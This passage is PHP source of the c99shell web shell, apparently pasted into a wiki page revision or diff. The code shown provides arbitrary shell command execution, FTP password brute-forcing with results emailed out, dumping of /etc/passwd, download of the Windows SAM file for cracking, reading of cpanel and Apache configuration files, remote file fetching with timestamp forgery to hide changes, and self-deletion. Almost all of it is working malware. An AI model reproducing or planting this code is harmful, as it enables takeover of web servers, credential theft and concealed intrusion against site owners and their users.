+ | if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} | ||
+ | $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); | ||
+ | echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; | ||
+ | $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; | ||
+ | if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | ||
+ | if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} | ||
+ | fclose($fqb_logfp); | ||
+ | } | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; | ||
+ | $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); | ||
+ | echo "<form method=\"POST\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging? <input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file? <input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail? <input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if ($act == "d") | ||
+ | { | ||
+ | if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} | ||
+ | else | ||
+ | { | ||
+ | echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; | ||
+ | if (!$win) | ||
+ | { | ||
+ | echo "<tr><td><b>Owner/Group</b></td><td> "; | ||
+ | $ow = posix_getpwuid(fileowner($d)); | ||
+ | $gr = posix_getgrgid(filegroup($d)); | ||
+ | $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); | ||
+ | } | ||
+ | echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} | ||
+ | if ($act == "security") | ||
+ | { | ||
+ | echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; | ||
+ | if (!$win) | ||
+ | { | ||
+ | if ($nixpasswd) | ||
+ | { | ||
+ | if ($nixpasswd == 1) {$nixpasswd = 0;} | ||
+ | echo "<b>*nix /etc/passwd:</b><br>"; | ||
+ | if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} | ||
+ | if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} | ||
+ | echo "<form method=\"POST\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>"; | ||
+ | $i = $nixpwd_s; | ||
+ | while ($i < $nixpwd_e) | ||
+ | { | ||
+ | $uid = posix_getpwuid($i); | ||
+ | if ($uid) | ||
+ | { | ||
+ | $uid["dir"] = "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($uid["dir"])."';document.todo.submit();\">".$uid["dir"]."</a>"; | ||
+ | echo join(":",$uid)."<br>"; | ||
+ | } | ||
+ | $i++; | ||
+ | } | ||
+ | } | ||
+ | else {echo "<br><a href=\"#\" onclick=\"document.todo.act.value='security';document.todo.d.value='".$ud."';document.todo.nixpasswd.value='1';document.todo.submit();\"><b><u>Get /etc/passwd</u></b></a><br>";} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | $v = $_SERVER["WINDIR"]."\repair\sam"; | ||
+ | if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} | ||
+ | else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='sam';document.todo.d.value='".$_SERVER["WINDIR"]."\/repair';document.todo.ft.value='download';document.todo.submit();\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} | ||
+ | } | ||
+ | if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='userdomains';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} | ||
+ | if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='accounting.log';document.todo.d.value='".urlencode("/var/cpanel/")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel logs</b></u></a></font></b><br>";} | ||
+ | if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/usr/local/apache/conf")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} | ||
+ | if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} | ||
+ | if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='syslog.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} | ||
+ | if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='motd';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Message Of The Day</b></u></a></font></b><br>";} | ||
+ | if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='hosts';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Hosts</b></u></a></font></b><br>";} | ||
+ | function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} | ||
+ | displaysecinfo("OS Version?",myshellexec("cat /proc/version")); | ||
+ | displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); | ||
+ | displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); | ||
+ | displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); | ||
+ | displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); | ||
+ | displaysecinfo("RAM",myshellexec("free -m")); | ||
+ | displaysecinfo("HDD space",myshellexec("df -h")); | ||
+ | displaysecinfo("List of Attributes",myshellexec("lsattr -a")); | ||
+ | displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); | ||
+ | displaysecinfo("Is cURL installed?",myshellexec("which curl")); | ||
+ | displaysecinfo("Is lynx installed?",myshellexec("which lynx")); | ||
+ | displaysecinfo("Is links installed?",myshellexec("which links")); | ||
+ | displaysecinfo("Is fetch installed?",myshellexec("which fetch")); | ||
+ | displaysecinfo("Is GET installed?",myshellexec("which GET")); | ||
+ | displaysecinfo("Is perl installed?",myshellexec("which perl")); | ||
+ | displaysecinfo("Where is apache",myshellexec("whereis apache")); | ||
+ | displaysecinfo("Where is perl?",myshellexec("whereis perl")); | ||
+ | displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); | ||
+ | displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); | ||
+ | displaysecinfo("locate my.conf",myshellexec("locate my.conf")); | ||
+ | displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); | ||
+ | } | ||
+ | if ($act == "mkfile") | ||
+ | { | ||
+ | if ($mkfile != $d) | ||
+ | { | ||
+ | if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} | ||
+ | elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} | ||
+ | else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} | ||
+ | } | ||
+ | else {$act = $dspact = "ls";} | ||
+ | } | ||
+ | if ($act == "fsbuff") | ||
+ | { | ||
+ | $arr_copy = $sess_data["copy"]; | ||
+ | $arr_cut = $sess_data["cut"]; | ||
+ | $arr = array_merge($arr_copy,$arr_cut); | ||
+ | if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} | ||
+ | else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} | ||
+ | } | ||
+ | if ($act == "selfremove") | ||
+ | { | ||
+ | if (($submit == $rndcode) and ($submit != "")) | ||
+ | { | ||
+ | if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } | ||
+ | else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} | ||
+ | $rnd = rand(0,9).rand(0,9).rand(0,9); | ||
+ | echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "search") | ||
+ | { | ||
+ | echo "<b>Search in file-system:</b><br>"; | ||
+ | if (empty($search_in)) {$search_in = $d;} | ||
+ | if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} | ||
+ | if (empty($search_text_wwo)) {$search_text_regexp = 0;} | ||
+ | if (!empty($submit)) | ||
+ | { | ||
+ | $found = array(); | ||
+ | $found_d = 0; | ||
+ | $found_f = 0; | ||
+ | $search_i_f = 0; | ||
+ | $search_i_d = 0; | ||
+ | $a = array | ||
+ | ( | ||
+ | "name"=>$search_name, "name_regexp"=>$search_name_regexp, | ||
+ | "text"=>$search_text, "text_regexp"=>$search_text_regxp, | ||
+ | "text_wwo"=>$search_text_wwo, | ||
+ | "text_cs"=>$search_text_cs, | ||
+ | "text_not"=>$search_text_not | ||
+ | ); | ||
+ | $searchtime = getmicrotime(); | ||
+ | $in = array_unique(explode(";",$search_in)); | ||
+ | foreach($in as $v) {c99fsearch($v);} | ||
+ | $searchtime = round(getmicrotime()-$searchtime,4); | ||
+ | if (count($found) == 0) {echo "<b>No files found!</b>";} | ||
+ | else | ||
+ | { | ||
+ | $ls_arr = $found; | ||
+ | $disp_fullpath = TRUE; | ||
+ | $act = "ls"; | ||
+ | } | ||
+ | } | ||
+ | echo "<form method=POST> | ||
+ | |||
+ | <input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> | ||
+ | <b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp | ||
+ | <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> | ||
+ | <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> | ||
+ | <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp | ||
+ | <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only | ||
+ | <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive | ||
+ | |||
+ | <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text | ||
+ | <br><br><input type=submit name=submit value=\"Search\"></form>"; | ||
+ | if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} | ||
+ | } | ||
+ | if ($act == "chmod") | ||
+ | { | ||
+ | $mode = fileperms($d.$f); | ||
+ | if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} | ||
+ | else | ||
+ | { | ||
+ | $form = TRUE; | ||
+ | if ($chmod_submit) | ||
+ | { | ||
+ | $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); | ||
+ | if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} | ||
+ | else {$err = "Can't chmod to ".$octet.".";} | ||
+ | } | ||
+ | if ($form) | ||
+ | { | ||
+ | $perms = parse_perms($mode); | ||
+ | echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if ($act == "upload") | ||
+ | { | ||
+ | $uploadmess = ""; | ||
+ | $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); | ||
+ | if (empty($uploadpath)) {$uploadpath = $d;} | ||
+ | elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} | ||
+ | if (!empty($submit)) | ||
+ | { | ||
+ | global $HTTP_POST_FILES; | ||
+ | $uploadfile = $HTTP_POST_FILES["uploadfile"]; | ||
+ | if (!empty($uploadfile["tmp_name"])) | ||
+ | { | ||
+ | if (empty($uploadfilename)) {$destin = $uploadfile["name"];} | ||
+ | else {$destin = $userfilename;} | ||
+ | if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} | ||
+ | } | ||
+ | elseif (!empty($uploadurl)) | ||
+ | { | ||
+ | if (!empty($uploadfilename)) {$destin = $uploadfilename;} | ||
+ | else | ||
+ | { | ||
+ | $destin = explode("/",$destin); | ||
+ | $destin = $destin[count($destin)-1]; | ||
+ | if (empty($destin)) | ||
+ | { | ||
+ | $i = 0; | ||
+ | $b = ""; | ||
+ | while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} | ||
+ | } | ||
+ | if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} | ||
+ | else | ||
+ | { | ||
+ | $st = getmicrotime(); | ||
+ | $content = @file_get_contents($uploadurl); | ||
+ | $dt = round(getmicrotime()-$st,4); | ||
+ | if (!$content) {$uploadmess .= "Can't download file!<br>";} | ||
+ | else | ||
+ | { | ||
+ | if ($filestealth) {$stat = stat($uploadpath.$destin);} | ||
+ | $fp = fopen($uploadpath.$destin,"w"); | ||
+ | if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} | ||
+ | else | ||
+ | { | ||
+ | fwrite($fp,$content,strlen($content)); | ||
+ | fclose($fp); | ||
+ | if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | if ($miniform) | ||
+ | { | ||
+ | echo "<b>".$uploadmess."</b>"; | ||
+ | $act = "ls"; | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" method=POST><input type=\"hidden\" name=\"act\" value=\"upload\"><input type=\"hidden\" name=\"d\" value=\"".urlencode($d)."\"> | ||
+ | |||
+ | Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br> | ||
+ | Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> | ||
+ | Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> | ||
+ | File-name (auto-fill): <input name=uploadfilename size=25><br><br> | ||
+ | <input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br> | ||
+ | <input type=submit name=submit value=\"Upload\"> | ||
+ | </form>"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "delete") | ||
+ | { | ||
+ | $delerr = ""; | ||
+ | foreach ($actbox as $v) | ||
+ | { | ||
+ | $result = FALSE; | ||
+ | $result = fs_rmobj($v); | ||
+ | if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} | ||
+ | } | ||
+ | if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} | ||
+ | $act = "ls"; | ||
+ | } | ||
+ | if (!$usefsbuff) | ||
+ | { | ||
+ | if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} | ||
+ | } | ||
+ | else | ||
+ | { | ||
+ | if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } | ||
+ | elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} | ||
+ | elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} | ||
+ | if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} | ||
+ | elseif ($actpastebuff) | ||
+ | { | ||
+ | $psterr = ""; | ||
+ | foreach($sess_data["copy"] as $k=>$v) | ||
+ | { | ||
+ | $to = $d.basename($v); | ||
+ | if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} | ||
+ | if ($copy_unset) {unset($sess_data["copy"][$k]);} | ||
+ | } | ||
+ | foreach($sess_data["cut"] as $k=>$v) | ||
+ | { | ||
+ | $to = $d.basename($v); | ||
+ | if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} | ||
+ | unset($sess_data["cut"][$k]); | ||
+ | } | ||
+ | c99_sess_put($sess_data); | ||
+ | if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} | ||
+ | $act = "ls"; | ||
+ | } | ||
+ | elseif ($actarcbuff) | ||
+ | { | ||
+ | $arcerr = ""; | ||
+ | if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} | ||
+ | else {$ext = ".tar.gz";} | ||
+ | if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} | ||
+ | $cmdline .= " ".$actarcbuff_path; | ||
+ | $objects = array_merge($sess_data["copy"],$sess_data["cut"]); | ||
+ | foreach($objects as $v) | ||
+ | { | ||
+ | $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); | ||
+ | if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} | ||
+ | if (is_dir($v)) | ||
+ | { | ||
+ | if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} | ||
+ | $v .= "*"; | ||
+ | } | ||
+ | $cmdline .= " ".$v; | ||
+ | } | ||
+ | $tmp = realpath("."); | ||
+ | chdir($d); | ||
+ | $ret = myshellexec($cmdline); | ||
+ | chdir($tmp); | ||
+ | if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} | ||
+ | $ret = str_replace("\r\n","\n",$ret); | ||
+ | $ret = explode("\n",$ret); | ||
+ | if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} | ||
+ | foreach($sess_data["cut"] as $k=>$v) | ||
+ | { | ||
+ | if (in_array($v,$ret)) {fs_rmobj($v);} | ||
+ | unset($sess_data["cut"][$k]); | ||
+ | } | ||
+ | c99_sess_put($sess_data); | ||
+ | if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} | ||
+ | $act = "ls"; | ||
+ | } | ||
+ | elseif ($actpastebuff) | ||
+ | { | ||
+ | $psterr = ""; | ||
+ | foreach($sess_data["copy"] as $k=>$v) | ||
+ | { | ||
+ | $to = $d.basename($v); | ||
+ | if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} | ||
+ | if ($copy_unset) {unset($sess_data["copy"][$k]);} | ||
+ | } | ||
+ | foreach($sess_data["cut"] as $k=>$v) | ||
+ | { | ||
+ | $to = $d.basename($v); | ||
+ | if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} | ||
+ | unset($sess_data["cut"][$k]); | ||
+ | } | ||
+ | c99_sess_put($sess_data); | ||
+ | if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} | ||
+ | $act = "ls"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "cmd") | ||
+ | { | ||
+ | if (trim($cmd) == "ps -aux") {$act = "processes";} | ||
+ | elseif (trim($cmd) == "tasklist") {$act = "processes";} | ||
+ | else | ||
+ | { | ||
+ | @chdir($chdir); | ||
+ | if (!empty($submit)) | ||
+ | { | ||
+ | echo "<b>Result of execution this command</b>:<br>"; | ||
+ | $olddir = realpath("."); | ||
+ | @chdir($d); | ||
+ | $ret = myshellexec($cmd); | ||
+ | $ret = convert_cyr_string($ret,"d","w"); | ||
+ | if ($cmd_txt) | ||
+ | { | ||
+ | $rows = count(explode("\r\n",$ret))+1; | ||
+ | if ($rows < 10) {$rows = 10;} | ||
+ | echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | ||
+ | } | ||
+ | else {echo $ret."<br>";} | ||
+ | @chdir($olddir); | ||
+ | } | ||
+ | else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} | ||
+ | echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; | ||
+ | } | ||
+ | } | ||
+ | if ($act == "ls") | ||
+ | { | ||
+ | if (count($ls_arr) > 0) {$list = $ls_arr;} | ||
+ | else | ||
+ | { | ||
+ | $list = array(); | ||
+ | if ($h = @opendir($d)) | ||
+ | { | ||
+ | while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} | ||
+ | closedir($h); | ||
+ | } | ||
+ | else {} | ||
+ | } | ||
+ | if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} | ||
+ | else | ||
+ | { | ||
+ | //Building array | ||
+ | $objects = array(); | ||
+ | $vd = "f"; //Viewing mode | ||
+ | if ($vd == "f") | ||
+ | { | ||
+ | $objects["head"] = array(); | ||
+ | $objects["folders"] = array(); | ||
+ | $objects["links"] = array(); | ||
+ | $objects["files"] = array(); | ||
+ | foreach ($list as $v) | ||
+ | { | ||
+ | $o = basename($v); | ||
+ | $row = array(); | ||
+ | if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} | ||
+ | elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} | ||
+ | elseif (is_dir($v)) | ||
+ | { | ||
+ | if (is_link($v)) {$type = "LINK";} | ||
+ | else {$type = "DIR";} | ||
+ | $row[] = $v; | ||
+ | $row[] = $type; | ||
+ | } | ||
+ | elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} | ||
+ | $row[] = filemtime($v); | ||
+ | if (!$win) | ||
+ | { | ||
+ | $ow = posix_getpwuid(fileowner($v)); | ||
+ | $gr = posix_getgrgid(filegroup($v)); | ||
+ | $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); | ||
+ | } | ||
+ | $row[] = fileperms($v); | ||
+ | if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} | ||
+ | elseif (is_link($v)) {$objects["links"][] = $row;} | ||
+ | elseif (is_dir($v)) {$objects["folders"][] = $row;} | ||
+ | elseif (is_file($v)) {$objects["files"][] = $row;} | ||
+ | $i++; | ||
+ | } | ||
+ | $row = array(); | ||
+ | $row[] = "<b>Name</b>"; | ||
+ | $row[] = "<b>Size</b>"; | ||
+ | $row[] = "<b>Modify</b>"; | ||
+ | if (!$win) | ||
+ | {$row[] = "<b>Owner/Group</b>";} | ||
+ | $row[] = "<b>Perms</b>"; | ||
+ | $row[] = "<b>Action</b>"; | ||
+ | $parsesort = parsesort($sort); | ||
+ | $sort = $parsesort[0].$parsesort[1]; | ||
+ | $k = $parsesort[0]; | ||
+ | if ($parsesort[1] != "a") {$parsesort[1] = "d";} | ||
+ | $y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">"; | ||
+ | $row[$k] .= $y; | ||
+ | for($i=0;$i<count($row)-1;$i++) | ||
+ | { | ||
+ | if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";} | ||
+ | } | ||
+ | $v = $parsesort[0]; | ||
+ | usort($objects["folders"], "tabsort"); | ||
+ | usort($objects["links"], "tabsort"); | ||
+ | usort($objects["files"], "tabsort"); | ||
+ | if ($parsesort[1] == "d") | ||
+ | { | ||
+ | $objects["folders"] = array_reverse($objects["folders"]); | ||
+ | $objects["files"] = array_reverse($objects["files"]); | ||
+ | } | ||
+ | $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); | ||
+ | $tab = array(); | ||
+ | $tab["cols"] = array($row); | ||
+ | $tab["head"] = array(); | ||
+ | $tab["folders"] = array(); | ||
+ | $tab["links"] = array(); | ||
